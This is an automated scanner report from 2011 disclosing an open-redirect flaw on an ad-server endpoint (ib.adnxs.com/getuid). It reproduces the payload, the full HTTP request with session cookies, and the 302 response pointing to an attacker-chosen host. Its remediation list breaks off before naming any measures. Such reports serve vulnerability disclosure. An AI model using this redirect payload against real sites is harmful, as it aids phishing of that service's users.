Open Redirection, Arbitrary Supplied Request Parameter

CloudScan Vulnerability Crawler | Open Redirection Example PoC

Report generated by Hoyt LLC Research at Sat Feb 12 19:43:09 CST 2011.

The DORK Report

Loading

1. Open redirection


1. Open redirection

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload http%3a//a21176f6ce064ea74/a%3f1 was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

Request

GET /getuid?http%3a//a21176f6ce064ea74/a%3f1=1 HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfw)mCZ(]G)J70w+=yTXYSoI81$GT2%P.Fs/Z'i@r'Nj7qqZFRm4V'%EUd@k)p'R2d$I:)R5]iv(Eb*4:P4h%C@1=-S^_hGu@a[kt]lA!LW2VYpJYWI758p-wS(7.aiq='MK:0T<o`GQudYGTfIIv7IJ4X*FV+2KwVqix-BQX*iV2m=N5e_ArSaX`x(TD9]I?Lx1^(Pkc/(U6p:UNE`H:]kF#or$a:#.8^1aMUKsQS*5T+w8/lvWH*`Pe7wPB`n..>*1(L>BhYi%AMazz!+KblkJ?VindLbDQznB4HNXYoIZF'w8(N852RcGROGo[HO5KGb?VR@Cqkv]SL8W*Jd<GCT@qFDyA^LKAB/sy*PO]pXk:5pP1z_Ol=Hi_5*m'N5mAsNWgtDR9FmP4<3>3i-!Smm?tk-zNC!rP]l_$INIVY*:2'=fT7R1mkau)j(/96%9eEV1+Ochgk]j`eA)bdG<uJ-(/a5reS%DHuJG6*DHoA/NqzViCZH8tEd3Bx6:V=I.uv85!bYjIue[anS(+AnO^u3k-W(gHZMYMv<@#aqIU4%Iv`.s_i*i8>@wdl8QtM3hQiO$k)z@VnVpF2dP4f`dKSe?`M%u(D:2NICjisGCb@$Ir!TTtDN9SZZf^zxXGEExLlr2D>.NCk^To#JvU$>Sx9nZG88(B1pTM#lXYp?yu#EOYC67+).PvMT; icu=ChEI9nYQChgDIAMoAzCQnNvqBAoRCLN-EAoYASABKAEw_qjb6gQQ_qjb6gQYAw..; uuid2=4760492999213801733; sess=1; acb793602=5_[r^kI/7Zs/wcp!@@-#b%xgX?enc=x9rf2R69xT_mRBbEm5DDPwAAAAAAAAhA5kQWxJuQwz_H2t_ZHr3FP26CZTFwB8AuBWHfHSmrEEJ-1FZNAAAAAPA7AwA3AQAAZAAAAAIAAAA4UAIAy10AAAEAAABVU0QAVVNEANgCWgCqFAAAVQQBAgUCAAUAAAAANCLPlAAAAAA.&tt_code=cm.mtv&udj=uf%28%27a%27%2C+27%2C+1297536126%29%3Buf%28%27r%27%2C+151608%2C+1297536126%29%3Bppv%2882%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2884%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2811%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2882%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2884%2C+%273368700699719598702%27%2C+1297536126%2C+1307904126%2C+17328%2C+24011%29%3Bppv%2887%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28619%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28620%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3Bppv%28621%2C+%273368700699719598702%27%2C+1297536126%2C+1297622526%2C+17328%2C+24011%29%3B&cnd=!ERxaJAiwhwEQuKAJGAAgy7sBKAAxxtrf2R69xT9CEwgAEAAYACABKP7__________wFCDAhSEIXCGRgLIAMoAkIMCFQQo_kPGAcgAygCSANQAFiqKWAAaGQ.&custom_macro=ADV_FREQ%5E1%5EREM_USER%5E0%5ECP_ID%5E17328;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 14-Feb-2011 01:36:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Sat, 14-May-2011 01:36:42 GMT; domain=.adnxs.com; HttpOnly
Location: http://a21176f6ce064ea74/a?1=1
Date: Sun, 13 Feb 2011 01:36:42 GMT
Content-Length: 0
Connection: close

Report generated by Hoyt LLC Research at Sat Feb 12 19:43:09 CST 2011.